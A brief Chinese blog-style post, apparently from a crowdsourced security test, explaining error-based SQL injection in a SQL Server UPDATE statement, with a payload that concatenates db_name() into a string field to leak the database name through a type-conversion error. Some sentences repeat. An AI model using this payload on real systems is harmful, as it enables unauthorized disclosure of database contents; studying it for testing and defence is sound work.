sql server update 报错注入
众测的时候碰到的,好像这个也没什么可写的。
直接利用类型转换来报错就可以了。
sql server字符串和数字进行比较的时候就会报错并把字符串的内容显示到错误上。
update mosuan set xx=11,bb='xx',nobb=1 where id = 1
直接利用类型转换来报错就可以了。
update mosuan set xx=11,bb='xx'+db_name()+1+'',nobb=1 where id = 1
sql server字符串和数字进行比较的时候就会报错并把字符串的内容显示到错误上。
1 个评论
666666
